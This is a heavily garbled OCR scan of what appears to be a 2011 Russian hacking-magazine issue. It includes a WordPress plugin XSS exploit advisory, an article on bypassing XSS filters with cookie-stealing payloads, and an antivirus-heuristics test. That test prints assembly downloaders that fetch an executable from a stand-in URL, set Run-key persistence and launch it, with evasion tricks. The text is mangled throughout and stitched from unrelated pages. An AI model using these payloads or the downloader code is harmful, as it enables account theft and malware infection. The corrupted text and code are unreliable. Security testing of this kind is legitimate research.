t Tesced on: iiindows 0 fCVE,HftfHHffffffHHffHffffffftffHfHHftffffffffffffffHHfffHtH f SIESTTA 0. О (LFI/XSS) Mulciple Vulnerahilicif!:!l .f download: hccp: 0 /opensourceb:rew. orq/beer-recipes-pluoin/ f f Auchor : TheUzuki. • f:rom HF f mail: uzuki[Q)live{doc)de

f This was wr1t.cen for educacional purpose. Use it; at; your own risk. Ье noc :respons1Ыe tor any damaoe.

В итоге паркет учим аlегt-окошко, выведе н ное сверху диcплeй :

f Aut;hor will 1

HfHfffffHHfHHHHfHHHffffffffHfHHfHfffHHHfffHffffff

<html>

f f Noces: You need

<script > var а="123" ; al ert ( document.cookie);

/1

что касается п бретер ции из

ь - "" '·

-

" а"

</sc r i pt >

со

Ье

User

дока

che Wordpress :aoard

f fffHffHffffHHHffffffffffffHHfHHfHHHHHHfHHHfHHHf --Descripcion ot Nordpress Plugin-Creaces

а

cuscom. post;

суре

for easily enterino beer recipes into 0;ordPr

--Exploic--

</html>

0у Commenting а 0eer Recip, with Thi!l causes а XSS.

В В - коды

Очень сплошь и рядом во различных форумных, блоговых равно других движках можно вст р етить этак называемые В В -коды, кото р ые разрешают вставку токмо конкретных те г ов, для примеру: [а] ,

[img] ,

а

javascript, the Javascripts,get!l

ехе

- - РоС--

<script>alert {document . cookie) </script>

[Ь]. Не меньше

сплошь и рядом встречаются да такие случаи, в отдельных случаях веб-разработчики легко

f

0 ЗЗ1dа v

corn {2011-06-25]

производят замену"[" на"<", никак не фильтруя остальное содержимое. Здесь равным образом не запрещается утилизировать упомянутые раньше js-обработчики.

Пример такого использования:

И юньс кая

XSS на п ла г ан е WoгdP гess

[img src="!@#$%л " onErro r="alert(l);" ] Недостаточные атрибуты

.......

Также экстремально интересен э п изод не без; недостаточными атрибутами:

-

<? ph p echo( ' <input type="text" value="'.strip_tags($_ POST [ 'data' ] ) . ' ">' ) ; ?>

XSS на DuoCMS Чт по отношению но д е л а т ь на этом от л учае? Н а догадка п рихо ди т интерполяция какого­

нибудь обработчика, как-то , onMouseOveг. Н что до поле, вроде назло, на­

<scri pt src="javascript :alert(document.cookie);" ></sc r ipt>

ходится во самом низу страни ц ы, равно ламер сомнительно ли наведет сверху

него мышью [указанный шлифовальщик запускается подле в воде курсора мыши держи элемент!. Решение баста простое- прибросить до этого времени один атрибут во тег

Данный ба г допускается быстро проэксплуатировать на случае вставки

каких-либо ссылок бери страницу, идеже фильтруются хоть символы<>"'.

input. Имя ему- sty le. За ч ем? Затем, дай тебе от помощью Контроль регистра вводи м ыхданных

стилей учинить зто п репатриант разме р ом н а всю стра вниз у . Так бьющий по глазам

Очень простым и, по образу ни странно, впол н е рабочим не без; п особом обхода

злемент совсем аккуратно пятая точка д ет за д движок юзе р а . Вот безраздельно с

примеров реализации общей сложности сего малограмотный п отребства:

всевозможных

XSS защит является вариант регистра вводимых

тегов/протоколов. Часто фильтр режет лишь теги с нижнего регистра,

" onMouseOver="alert(document.cookie)" styl e="position:absolute; top:-1eeepx;left:-1eeepx;width:seeepx;height:seeepx;z-index:1eeee;" musor="

например: на

body, script, javascript . Изменив какография данных тегов bOdY, sCripT равным образом JaVaScRiPt, автор сих строк несомненно обойдем такую следовать щ иту. Обход защит нерекурсивного удаления подозрительных данных Если постараться насадить любые теги на тестируемый скри п т, ведь около

беспременно таковой самый скрипт не мудрствуя лукаво удалит их. Данную защиту также Теория перехода

позволяется обойти, когда используется одноразовое выливание подозритель­

Любой браузер может засовывать JS-ко д вследствие по отношению д ноименный про­

ных слов иначе говоря символов. Различие в среде одноразовым равно многоразовым

токол. Это представляется возможным пр равно п ереход е п что касается ссы л ке ви д а

«j avascript : al ert(1);>>.

Вот п р да мероприятия тегов, идеже равно со п ол ь зуется ссы л об ч ­

удалением зависит оттого, рекурсивна ли круг обязанностей удаления иначе нет. Вот экземпляр одноразового удаления:

ная основа:

$code=str_repl ace( "<body" , "" , $code); <а h ref="javascript:alert(document.cookie);" >Moи фот ки</а>

<iframe src="javas cript:alert(document.cookie );" ></iframe>

ХАКЕР

01/154/2011

А вона модель рекурсивного удаления:

081


взламывание

ПРАКТИЧЕСКИЕ СОВЕТЫ После ознакомления не без; н еско льким да обходами

СкрытноеиспользованиеактивнойХSS

JavaScript

защит ото ХSS-атак настало период выкроить

Та кже популярной ошибкой является

Еще одним редким, однако метким методом является

не заговаривать зубы некоторым п рактически м сове т ам присутствие

ансамбль лени е ядовитой ссылки от активной

работе из

равным образом с прав ка ее админу нужного ресурса. Админ

во страницу. В д анном случае не грех завалить

д алеко никак не завсегда в такой мере прост, по образу кажется. Он

каждому свой флеш-ролик, какой хорэ

Анонимность

мгновенно безвыездно поймет. Гораздо отпустило сложить

отправлять пресловутые кукисына твой снифер .

После получения пользовательских данны х

страничку из таким кодом:

XSS:

вместе с через

XSS

flash

заваливание ядовитых flаsh-файлов равным образом вписка их

HTML

(лаги н, движение цена другими словами сессия)

Универсальный градиент

воспрещено разучиваться для безымянность . Способы ее

<body

организации издревле известны : ради кси/соксы,

ссылка'" ></ Ьоdу >

VPN, дедик

XSS

посредством

oпload; "location.href;'ядoвитaя

Универсальный вектор- сие внедряемая на

НТМL- вместе с тр аницу строка, ко торая в конечном счете неграмотный

да другие.

ради ви сит через окруже ни мы равно вызывает небезукоризненность

XSS.

вслед т ем сохра уток ее нате только фрихает

подобно

Подстанов ка куковсебе

(например, dalmatincy.fhost . гu ) от именем

возьми составле ни е п что до д обн ы х векторов. По зволю

П одставить себя чужие кукисы свободно путем

jpg

браузер Орега (Инструменты~ Д ополнительно

беспричинно :

глобальный градиент что касается т Gaгeth

AddType application /x -httpd-php .jpg

java script: /*- - ></ marquee ></sc ript ></ title></textarea></noscript></style> </xmp >"> [img;l] <i mg -/style;-

~Управление

cookiesl, а

равным образом настроить апачевский

oshibka .

.htaccess обложка

видишь

себя во качестве примера п проявить мозголомный

подставпять неуклонно на адресную строку браузера. К примеру, на моем самаписнам снифере любые

Далее возьми админскую почт у высылается

кукивыводятся неуклонно на виде готового JS-кода.

к примеру такое письмо:

Таким образом, мы зараз получаю строку вида

возьми нем:

;expression&#48&#47;&#42;' / - /*&#39; , /**/ eval(name)//&#41;;width:lee%;height:lee% ; position : absolute ; behavior:url (#default#VML);-o-

Ещ е меньше значительный вариант- сие работа

link:javascript:eval(title);-o-linksource:currentname;

j ava script: documeпt. cook ie;" key;v alue";

Здравствуйте,

(вставляем ее н а атакуемой странице во

сайт,

адресную строку равным образом нажимаем Епt ег).

http ://dalmatincy.fhost.ru / oshibka.jpg

ми адски

нравится

а пишущий эти строки далеко не знаю в духе давать

Ваш

эту ошибку

Замаскированнаяпроверка Хочу оповестить тебя ото захода в занимательный

сайт равным образом мгновенного ввода в однако д оступные

script>.

"><script>alert(l);</

Это выглядит круглым счетом но глупо, вроде выискать

автоматический прибор от кофе, кто пр равным образом зажатии

запускать лапу всё-таки деньжата нате глазах людей вокруг.

XSS

ifгame со ядовитой ссылкой. Причем соз верно ние

alert(l) onerror;eval(name) src;l auto focus onfocus;eval(name) onclick; eval(name) onmouseover;eval(name) backgr ound;javascript:eva l(name) //>"

такого ifгame отпустило осуществить подвижно

помощью

JS

равным образом по прошествии времени закриптовать оный код:

0 каких­

либо кнопок выдает совершенно деньги, да отдельный день Любые пентесты

Heyes:

тоже путем плагины

во других браузерах. Ещ е кукисы не возбраняется

полина что-то слыхать

На многих хак-форумах идут конкурсы

<scr ipt >var l;['reverse' , 'join', 'split', 's lice', '93В', '2CSF //

мотивированно прозябать

Да , фактически интересное вердикт ,

тихо с админис трат ора равным образом п ользователей .

/9/ 03D225F //73/3/F/ E74223EЗC2F / 0 /97/3 E27

исполать Гаресу Хейсу ( twitteг. com /#!/gaгeth­

Например, ради проверкифильтрации символов

093' ],il;'б ' ' il;'con \x73\x74\x72\ x75c tor', 01;' ',_;[ 'length ', 'unescape'],li;[] , ll;this;l;l[l[3]](4l [l[e]]()

heyes).

"<"

равным образом

">"

не грех несложно назначить на п олим ввода

з н ачение " < привет! >". Затем смо трим НТМLкод полученной вместе с т рани цы и, буде д практически ны е символы вам велись во не без; воем первозданном

подобные вставки побуждают админа латать дыры, ась? влечет после на вывеску огромную п а ле вность.

Также сму щ ает размер да рефлекс получай разные

виде, продолжаем вместе с делить изо себя д урачка следующим образом:

Н о, исходя изо практики поиска ХSS­

багов, э т по части отнюдь не сто ль эффектив однако , где-то на правах

фильтры каких-либо пора т ей вектора. Л ично моя особа

join(ll))(); </scri pt >

вовеки отнюдь не использовал подобные головоломки именно соответственно сим виновник м. Н о, если бы ударяться

Dead <Body > - Track

б.mрЗ

И эдак дале со остальными тегами.

Подробнее относительно шифровке JavaScгipt читай на

бери п исанием ска н фигляр

сентябрьском номере журнала.

может пр игодиться.

function recursiveReplace($text, $replace, $repalce_to) $text ; str_replace($replace, $repalce_to, $text); return (strstr($text, $replace)) ? (recursiveReplace($text, $replace, $repalce_to)) : ($text);

XSS,

таковой вид

<bo<bodydy onload; "alert(l)" > По сле удаления

«< body>> нынешний

ко д хорэ полностью работоспособным:

<body onload; "alert(l)" > ПОСЛЕСЛОВИЕ Я надеюсь, что, невзирая нате некоторую баянистость кросс-сайтового

$code ; recursiveReplace($code, "<body" , "" );

скриптин га, твоя милость вместе с интересом пр очитал настоящий материал. В любом случае помни, что такое? всегда новое- сие хоро ш насчёт забытое старое. Кто знает, может

В таком случае

«<body>> удаля ется

с заключение до самого тех пор, на срок адрес отнюдь не

быть, чрез изрядно парение ба гокопатели обнаружат новые интересные

хорош его обнимать . Обход одноразового удаления выглядит следую­

способы обхода всевозможных фильтров, да я бесспорно в отношении них на­

щим образом :

пишем ::И:

082

ХАКЕР

01/154/2011


Preview СЦЕНА

01

КОРОБКА В ОБЛАКАХ История успешного старта па, какой-никакой

начался вместе с беспритязательный идеи, вроде свершить мир лучше, а пользователей-счастливее .

Когда во 0008 году ДрюХьюстон равным образом его на­ парникдраш Фирдоуси затеяли учреждение

Dropbox, ны рынкеуже были продуктыдля для синхронизации данных, были утили­

тыдля бэкапа, да были системы контроля версий. Однако парням посчастливилось убедить инвесторов, зачем у пользователей прежде сих пор чистый го, почему им подлинно нуж­

но- простого какдве дешевле пареных грибов сервиса, который единовременно решал бы по сию пору постав­ ленные задачи. Написанный прототип на Pythoп, основанный получай мощностях Amazoп SЗ+ЕС2, амором превратился на бе­

шено общераспространенный проектс 05 миллионами пользователей .

UNIXOID

MALWARE

01

АСС ЕМ Б ЛЕРОМ ПО ЭВРИСТИКЕ

Тесты антивирусов-наше любимое за­ ня т ие. В сие т крата я проверили эвристи­ ческие алгоритмы п опулярных продуктов своими харкорными методиками.

• .

БОЛЬНЫЕБОТЫ

Aпdгoid Maгket безвыгодный проверяет добавляе­ мые приложен равно я, нежели динамично пользуются

создатели малвари . Но который представляет

• ХАКЕР

Многие серьезные разработчики софта

используюаппаратнуюзащиту HASP. Но даже аппаратный источник можноэмулиро­ вать, далеко не прибегая ко пальянику.

01/154/2011

Как выдвинуть для основной план одному L iпuх-приложению

00% процессарного времени, другому5% оперативки, а третьему - итого 028 Кб ширины интернет-канала? Да ле г ко'

на вывеску устойчивый зловред?

SYN/ACK

CODING

ANTIHASP

01

ВОЙНАЗАРЕСУРСЫ

01

DLL-ХАРДКОДИН Г

Чтобы засунуть особый код, малограмотный обязательно компилироватьеговехе-файл равным образом ждать, когда Юзеф ер кликнет по мнению нему на проводнике.

Внедряем свою

DLL во чужую программу.

01

НА СТРАЖЕ ПЕРСОНАЛЬНЫХДАННЫХ Разговор атом, что лигитимно защитить персональныеданные, неграмотный покупая кота на

мешке. Опыт человека, некоторый съел на этому собаку.

083


MALWARE

Самое базис равно з всех чита­ тельских пожеланий, которые нам присылали по части следам

предыдущих тестов,- одонтагра ­ ше х ардкора . Ну сие ты да я да самочки

хотели заручиться : ] . А следую ­

Сергейка Греков

-

Полный стихи статьи ж дет тебя получай диске .

0]

качес тв е уча со тнико во д ля получи ш его что касается ч ере дн ого теста моя персона вы­

б р а л п мы т ь аверо во с совер ш е н так разных << ка т егорий»:

AVG, Avast, ClamAV, Pa nda, Comodo. Как види ш ь, т ут пр ису т ствуют

четное число ы ре халяв н ых а н тиви р уса, равным образом по части д ин- крутой, платн ый, от медве­ дем получи обложке, пользу кого сравне н ия. Все тесты аз многогрешный относительно на од сапропель лещадь VmWaгe вместе с

установленной Wi ndows ХР SРЗ х86. << Вирусы >> про теста автор писал получи и распишись ассемблере, а компилировал

МАSМ'ом. П ре д ы д у щ ий задача l xakep.гu/post/56236/default . asp l заклю­ чался на том, ч в таком случае ваш покорный слуга нашел п ростенький Downloadeг, каковой улучшал

щее соответственно популярности мнение­

различными п у тя ми , ради отделаться через дескать т ектирования. П ри-

вяще подозрительности чтобы

нежели буде на пр ош л ый единовременно мы старался истощить тонкости работы

объектов тестирования. Вдруг некоторые аверы малограмотный определя­

ли наши тесты потому, аюшки? они

пр оцессо р а на х86, ведь данный ч дока моя персона п робовал обой т да практически т ивирус, п риме н яя особе нн ос ти Wind ows.

ВИРУС НОМЕР РАЗ Во т ко д свой е г об п е рв ого возле мерило :

далеко не ахти подозрительны? ОК, сделаем прогу, которая скачи­

вает фа й л изо сети, записывает его на мотор з агрузку да запускает.

Сомнительный функционал, не так ли?

.data pi PROCESS_INFORMATION <> sta r tupinfo STARTUPINFO <> . data dd RunKey db "SOFТWARE \Microsoft \Windows \ CurrentVersion \ Run " , Malware db "Malware" , e р Кеу

ХАКЕР

е

01 / 054/2011


Ассемблером объединение эвристике

* л

0 __

.__._

0

;.

0

0'

+

0 '

•••

.

r ~a..-

'

.ее

"' ' D--

'

~.

_ _ , ___ ...__

J;

0

••'t1J

01'/f!i!!m!!'!!"""'"&l=~-:::-=~:.::===.:,~~:.:.::-.о.. l!piAD(I-THtl1710110tl-..ntOY!W*t,-IIIOoH~MW-Т8б~W--!'CNНw/l .--.,C'I- IOOI~tтpOQ"~OIIfi'!Wo\OЖ~IJNIMfOMJТ>Ntcl•oO!IoиtttМA811t

-.ЯAIIONн~мnRпt~~lllfiiiiii~"--.,~'~~A Ооо&жо-~

t), . _

_.... _ _ .s..t.

•!I\IOJihOНIТ8Rn~oa-n.нм~W-WI!c~g&"p~~" ЦliфfJOIWICIIOJifiHC ... oC.бн~IIOOJIIICНOICICr....-. oCIIНIIjiOOМIO!Ifii*ADCf'/1\t~HFrмВSOIII,

• t!OII\'t...",~ • ..-.oe.-.Rнea-IOPAI•H~(~тe-ooo:o~ OtiOIКIIТWWOOoO.,o-noc~

··---

Кf!IOt-AOAI.-•II-.__Ciopмmиo,oo:ncчnlip,RAR,Tar,Qzip,IIZIIp.1,0\..E2,

~CНI(8W.,81$мдp~n~t;

касательно ~naмtf!OUI~IItllll~fOfl\0'<1- . ."""'· о K~~··-..-.o.ELfнPer!IЫtE*utiЬII,DD~Uf'XrSO,PIIIIt, thPкl!,-lal,МEW,Upldlнa..,иr...-StJE,YOOaCr/IIIOrн~

а

comodo

clamav- опенсорсный антивирус,

мертвяк желанный нашими юниксоидами вроде Андрюшка равно Сергея Яремчука, нахраписто победил. С них причитается!

бдит согласно полной программе. Но ему однако нравится!

.code url db "http:/ /www . malwareurl.com/malware . exe·~, e pathtosave db " c: \ windows \ system32 \ malware.exe" , e start: invoke URLDownloadToFileA, е , offset url, offset pathtosave,

е,

.......... •

mov еах_, [ еах + leh ] mov еах, [еах + езсh ] mov еах, [еах] cmp еах, dword ptr [discCroot] jz malware_code jmp exit

е

malware_code:

invoke RegCreateKeyExA, HKEY_LOCAL_MACHINE, offset RunKey, е , е , REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, е , offset рКеу,_ е

Здесь приведена токмо << интересная >> ча вместе с ть кода, что-то около наравне все остальное осталось аналогичным предыдущему вирусу. Но буква по­ следовательность инструкций кровь из зубов nокажется большин не без; тву

invoke lstrlenA, offset pathtosave

читателей неочевидной. А на не без; е потому, который пишущий эти строки куда хитер:). В самом

invoke RegSetValueExA, рКеу, offset Malware, offset pathtosav~, еах

е,

REG_SZ,

начале во реестр ЕАХ попадает предмет nамяти в соответствии с смещению ЗОh на сегменте

FS.

В си из темах

Windows NT

во этом ме от те содержит­

ся обозначение в содружество РЕВ [Pгocess Enviгonment Block). Этот установка

invoke RegCloseKey,

включает системные показатели , описывающие дело . Далее пусть будет так

рКеу

лозунг ко элементу, отстоящему держи 00h ото основы РЕВ ' а- ука­

invoke CreateProcessA, offset pathtosave, е , е , е , NORMAL_PRIORITY_CLASS, е , е , ~, __offset startupinfo, offset pi

зателя для

RTL_USER_PROCESS_PARAMETERS.

Затем «вирус >> беретик дворд до указателю по части смещению ЗС . По этому смещению расnолагается стих на молод да коде, содержащая

текущую паnку . Таким образом, если бы « вирус >> запускается не без; ди вместе с ка

invoke ExitProcess,

С, в таком случае во регистре ЕАХ требуется угодить достоинство discCгoot . Так

е

надлежит состоять рядом нормальном исполнении файла, а антивиру с может да малограмотный состоять осведомлен об содержимом упомянутых структур .

retn

Таким образом, ежели во регистре ЕАХ окажется отнюдь не начало диска С, то слушание вынужден завершиться. Если эмпиричность во антивирусе отнюдь не

Здесь по сию пору очевидно- тупое переписывание файла близ помощи

URLDownloadToFile,

а после пуск сего файла вместе с через

знает, равно как согласно правилам исnолнить всё код, то, скоренько лишь , обложка

CгeatePгocess. Помимо сего nроизводится приложение скачанно­

окажется « чистым >> . Протестировав его , видим , ась? те а самые

го файла во автозагрузку стандартным путем. По идее, всегда пред­

двойка антивируса его равно обнаруживают, а другие трое ещё

ставленные антивирусы должны его детектить. Однако оказалось,

м об лчат.

ась? приметить минимальный Downloadeг способны просто-напросто

ClamAV.

Причем

AVG

выдал «общиЙ>> вердикт, а

ClamAV,

AVG

да

по­

ВИРУС ЗА НОМЕРОМ ТРИ

видимому, нет- Win32/DH равно W32 . SPERO.Pгolixus.0825 соответ­

Теnерь ваш покорный слуга решил опробовать , знают ли антивирусы насчет содержание

ственно. Идем после этого .

модуля keгnel32. Для сего автор со ваял нижеперечисленный « троянец >> :

ЗЛОБНЫЙ ТРОЯН НОМЕР ДВА Вот шифр нашего второго близ мера:

kernel32 db "kernel32",0 dword_PE db "РЕ",е,е

discCroot db "С" , start: assume fs:nothing

start: push offset kernel32 call LoadlibraryA

mov

еах,

ХАКЕР

fs:[ Зeh ]

01 /15 0/201 0

е,

": " ,

е

mov

есх,

[еах

+

езсh ]

085


MALWARE "· AVG

-

Avast ClamAV lmmun1tet Panda Comodo lnternet

l=ERO Prol1xus 0825

W32.SPERO. Prol ixu s.0825

W32.S PERO.Prolixus.0825

l W32 .SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

-

Secuпty !

:

- .._

--+--------1

Результаты нашего теста

функции завершается неудачей, в таком случае п оследняя возвращает 08h.

mov е а х, [ еах + е сх ] cmp еах, dwo r d pt r [ dwor d_PE ] jz mal wa re_code jmp Exi t

Е вместе с ли антивирус невыгодный знает что до правильном возвращаемом значении, а просто пропускает функции сиречь поступает однова до - иному, да все равно неверно, так спирт вынужден устроиться соответственно ложной ветви, которая при­

водит для завершению процесса со через ExitPгocess. Эта попытка Этот адрес во самом начале п олучает ключевой адресок kегпе132. Затем

п роисходит призыв ко полю e_lfanew структуры IMAGE_DOS_

HEADER.

наконец-то заставила << отпасти >>

AVG, посему е д и~с т ве н ным ClamAV.

антивирусом, дескать т ектирующим таковой файл, по части для азался

Это степь охватывает сдвиг через основы файла по « нового »

заголовка. В качестве << свежо г по отношению >> могут выпирать РЕ- ,

ПРИМЕР НОМЕР ПЯТЬ

LE- равным образом N Е ­

з аголовки . Но во данном случае, очевидно, тама приходится помещаться

Н а п ос ледок моя особа решил пров е рить , как бы будут во е сти себя антивирусы,

дворд РЕ\0\0. На зто равным образом производится осмотр . Если антивир у со

е сли на коде короче прис у т от твовать немаленький да медленный цикл. Для сего

з нает, зачем в дальнейшем содержится, так файл, вернее всего, полноте задетекти­

аз многогрешный есть очере д утнапиштим << вирус >> :

рован, т ак вроде на э т ом случае хорэ ис п олняться раздел downloade г 'a. Ситуация из детектированием далеко не изменилась.

. code url db "http://www.malwareurl.com/malware.exe" , e pathtosave db "malware.exe" , e

ЧЕТВЕРТЫЙ ПРИМЕРЧИК Следующее, сколько моя персона решил проверить-работа эвристически х анали­ з аторов антивирусов со ре д кими АРI-функ ц иями. Причем функцию

моя особа на ы бирал т акую, с тем возлюбленная возвращала далеко не ноль без палочки равным образом малограмотный единовластно на случае провала. Мой сортировка пожар сверху TгeeResetNamedSecuгitylnfo:

.code url db "http://www.malwareurl.com/malware.exe" , e pathtosave db "malware.exe" , e start: invoke TreeReset NamedSec urityi nfo, e , e , e , e , e , e , e , e , e , e , e

рор

MSDN, буква цель сбрасывает secuгity infoгmation

во дескрипторах защиты выбранног относительно дерева объектов. Если предписание

Оnовещение AVG Resident Shietd

.-

•:J

Cycle_Begin : call GetTickCount sub edx, еах push 0eeeh call Sleep push е call GetModul eHandle

cmp еах, 0Bh jz Malware_Code jmp Exi t П что до д а н ным

start : mov есх, seeeh push есх

Х

есх

dec есх push есх jnz Cycle_Begin К од чрезвычайно тривиальный- 0000h раэ хорошенького понемножку активизироваться ф у нкция GetTickCount, GetModuleHandle равным образом Sleep, от параметром 0000h. В

результате дозволено короче проверить, со п особны ли эвристи ч еские

Обнаружена угроза!

практически а лизаторы обхо д ить такие долгие циклы !на обыч н ой машине код Downloadeг·a полагается пофигарить наполняться сравнение н относительно при помощи сутки:

Им.А файла :

c:\DocLrnents and Set th;ls\дA........crpaтop\Paбo 'loiЙ

Имя угрозы :

В0Зf«)ЖНО з.аражен..е неизвестныr-~ вирусом Wn32/DН . CXXXXXXJO{CXXXJBOOCHXXXXXJ20-!XXXXXJOO} ~

cтon\Xakep_Т!Yd . exe

Обнаружено f'1)И ОТtq:)ЫТИИ .

+ Переместить во хранwице (М) (рекомендуется ) Эаражежый файn бросьте неопасно помещен сверху изоляция на ХраниJИЦе вирусов .

+ Перейти ко файлу (G) Отi<рЫТИе nan<И, содержащей файл, во Г)юеод>И<е

+

0000h • 0000h; 0 000 OOOh; 03 086 080

мс;

03 086

с;

0398

мин;

03

часа!. Короче , когда антивир у сы будут просто-напросто равно вместе с полнять адрес !эм у ­ пируя либо — либо подо который собс т венной виртуалкойl, в таком случае времени у них для сие безвыгодный хватит. А гляди кабы у п ользователя компутер ь ютер будет работать кальпа безо перезагрузки , так нагрузка из << вредоносного >> урла успешно короче произведена . В итоге- нуль неграмотный изменилось.

Только ClamAV справился не без; э тим << вирусом >> , выне вместе с аз многогрешный постановление W32 . Wndows.

SPRO. Pгoli x u s .0825.

\1гнорvровать угрозу Определен-tЫЙ файп останется во текущем местоrюrюжЕ!Н'И нате АИС:ке . В целях

бе3011ё1СН0Сти t<DМ""'ОНеНТ Resic:lent доступ для эараженнь~>< файлам .

Shleld

безвыгодный nозволяет пользователям nолучать

ЗАКЛЮЧЕНИЕ Р езультатами сего теста автор был обескуражен. П относительно ч ему небесплатный ан­

тивирус ото

Panda синь порох никак не обнаружил ? ! П очему сатана п броневой ClamAV

нуль невыгодный пропустил , а всё-таки прочие пропустили?! Как вместе ра­ ботает Третий nример дете для тирован

086

AVG. Следующи й т ест симпатия у но невыгодный nотянет

AVG,

только невыгодный на се?!

что-нибудь ем у посчастливилось обнар у обитать только что порядком << вир у сов >>, Вопросы , как бы обычно, остались минуя ответов . :Х:

ХАКЕР

01/ 054/2011


Zeronights

За месячишко до самого конференции хорэ объявлен

Мы посетили бездна международных конференций с Индии

суммарный меню участников, прошедших пред­

вплоть до Америки равно повсеместно нас спрашивали относительно российских мероприятиях.

варительный отбор. Следи ради новостями!

Все удивлялись, рано или поздно автор говорили, что такое? sесuгitу-конференций в России нет. Слава Богу, на этом году переделка основания меняться, равно наш брат

ужас рады препроводить новую конфу Zeroпights, которая пройдет

05 ноября

FAST-TRACK СЕК

ИЯ

Помим касательно ведущий секции вместе с докладами, будет организована равно секция, посвященная не­

большим, а значимым исследованиям, а

на Питере.

опять же просто-напросто интересным мыслям, идеям равно

наработкам во области ИБ . В поток

минут

Федор Ярочкин

сийское еэс

школы, отечественный соотечественник, составитель Х-РгоЬе.

блемах равным образом их решениях, а в свой черед поднимут к

Приехал для н ам с Тайвани. Доклад: «Анализ

обсуждения острые вопросы . Кроме этого, на

компании

Digital

DEFCON

присутствие поддержке

Secuгity. Цель конферен ции­

(Amorize] . Хакер старой

05

Организа т ором мероприятия выступает рос­

докладчики расскажут по отношению наболевших про­

конце секции все в одинаковой степени какой пособник конференции

скопить лучших специалистов на своей области,

незаконной Интернет-деятельности>> .

которые расскажут что до последних достижениях,

Сэмюэл Шах

Oday уязвимастях

циалист соответственно безопасности, честной гостек получай

свое исследование, нарисовать проблему или — или

крупнейших международных конференциях

высказа т ься соответственно теме напрямик н а конференции.

да методиках взлома.

Доклады, представленные н а конференции,

спе­

сможет унаследовать

0 минут

славы да доставить

да бесподобный вместе с п икер. Прилетит с загадочной

на истинный час проходят твердый отчуждение

Индии . Доклад: « Веб-войны

командой независимых со п ециалистов, которые

равно выберут самых достойных . В числе про­

(NetSquare) . Известнейший

КОНКУРСЫ ПО ЖИВОМУ ВЗЛОМУ

0>>.

защитник Синцов (DigitaiSecurity] . Автор

Конкурсы любят все, равным образом организаторы конфы

граммнога комитета такие глобально извест­

новых методик эксплуатации да «уб ийца >> ДБО.

решили обитать их по-особенному. На

ные специалисты, как: Крис Касперски, Д ейв

Представит н а свой судопроизводство новейший страшная книга << Где

Zeгonights далеко не короче выдума н ных ситуаций.

лежат деньги?>>.

Желающим буду т предоставлены настоя-

Аител

ICEO l mmuпity, С Ш А], Пит ер Ван Иекхаут The Gгugq ICOSEINC, Тайланд], Женюша Климов IPWC, Россия], Илья ICoгelanTeam , Бельгия],

Саныч Матросов

(ESET]. Viгus-Fгeeman

излечитвсехотновыхтиповтроянов.Доклад:

щие программно-аппаратные комплексы равно

системы. На таких системах всякий сможет

Медведевекий IDigitaiSecuг i ty, Р оссия], Ни ки т а

«Со временныетенденциираэвитиявредо­

подвергнуть проверке приманка вместе с п особности объединение п оиску н овых

Кислицин (журнал «Хакер>>, Россия] равно Алек­

носных программ про систем ДБО>>.

уязвимастей будто

Санюха Поляков

АСУ-ТП, платежный терминал, сервер из

са ндр Матросов

IESET, Россия] . Н а всамделишный

минута еще заявлены следующие доклады:

Лексей Лукацкий

(Cisco] . В

представлении

неграмотный нуждается 0 Доклад:« Бостонекая источник

<< Да йте ми

(Digital Security) .

SAP пишущий эти строки его сломаю>>.

Оценит

безоnасностьприложений.Докладизсек­ ции FastТгack: <<Не трогай, а в таком случае развалится:

Oday

на режиме онлайн.

SAP

системой да многое другое- поди взло­

мать! Помимо этого, будут конкурсы ото н аших п артнеров получай огибание WA F, разыскивание уязвимастей да

киберпреступности сиречь какова бизнес­

хакинг торговля приложений во экстремальных

хакинг замков llockpickiпg] вместе с призами, закры­

модельсовременно г касательно хакера?~

условиях>> .

тыми замками. ::И:

ХАКЕР

01/154/2011

087


MALWARE

Овчинников Мишара aka Night Storm lnstorm901agmail.coml


Больные роботы

-

Кое-где в представленных сорцах мы допустили пару

ламерских ошибок. Это на того, чтобы вовсе уж неадекватные

• Ьlog .trendmicro.com -

Информация,

блог компании Tгend Мiсго, занимающейся разработкой антивирусного ПО, содержит много интересной информации

представленная

...

nредназначена

до невероятия в целях

до малвари, на томик числе да сообразно

ознакомления равным образом

андроидной. Там но твоя милость найдешь

самозащиты. Помни,

nолный nост что до

зачем наnисание

Google++

dёvelopers

на статье,

скрипткидисы далеко не

• www bгjghthub . com/moblle/

вредоносного ПО

кинулисьих безответно

google-andгojd . aspx - благоустроенный

карается законом.

компилировать.

англоязычный ресурс, возьми котором содержится бессчетно информации как в соответствии с использованию Android, так равным образом по части разработке nод него.

----

PUЫIC

Mt!thods

~·-=-"'~"'·-·~-..-·-.."'j·J===-•d•==ш::..~~-sмs .. ...., •• vun .,......,U...Inoodor

..-.oon

~doe(lrlgol\ll"'"""''f

.rJ Отnравляем платное

ВИРУСЫДЛЯ ГУГЛОФОНОВ: КАК ОНИ СОЗДАЮТСЯ И ЧТО С НИМИ ДЕЛАТЬ?

SMS?

заниях, а саму малварь ми выудить безграмотный посчастливилось . На какой есть случай, глянь свою карту памяти нате тема указанной папки, может быть,

тебе счастье улыбнулось чище

;1.

Буквально порядком недель обратно появилось некое ливрезон

Google++,

маскирующееся по-под использование интересах известной социаль­

утнапиштим узы с корпорации добра. Оно и собирает всю информацию о пользователе, да самый большой заинтересованность общественности вызвала

деятельность « подслушивания разговоров >> . На практике совершенно оказалось банально: быть обнаружении входящего звонка вставка перево­ дит автомат на молчаливый режим, скрывает известие по отношению звонке и поднимает трубку. Что такого допускается подслушать, коли светофон лежит

В стане владельцев мобильных телефонов на ОС

Android

не без; недавних пор растет беспокойство.

Причина тому- памяти растущее доля

во кармане, автор отнюдь не знаю, пускай бы разве учесть, в чем дело? возле переговорах многие

семя кладут светофон прежде собой, в таком случае определенная нарост с такого

способа может быть.

СТРАТЕГИЯ И ТАКТИКА Google вслед за то, что-то они

всевозможной малвари, которая пробирается

Трудно винить

получи автоматы владельцев, притом далеко не откуда­

для мар кете. Ведь сие были самые обычные приложения , так из недо­

нибудь, а весь легальным способом­

(которая существует на

устанавливается вместе с маркета. Не будем оставаться в стороне равным образом познакомимся из ситуацией поближе.

кументированными функциями

неграмотный уследили после приложениями

:1. Отсутствие тщательной

проверки

Apple AppStoгel как и понятно- сие стадия на­

навстречу разработчикам, так чтобы те могли результативно расходовать равно

освежать близкий софт. С точки зрения злоумышленника пишущий сии строки имеем рукоделие не без; банальной со­ циальной инженерией . Кто смотрит получи и распишись разрешения, которые запрашивает проект ради

rtiiMIIIIil

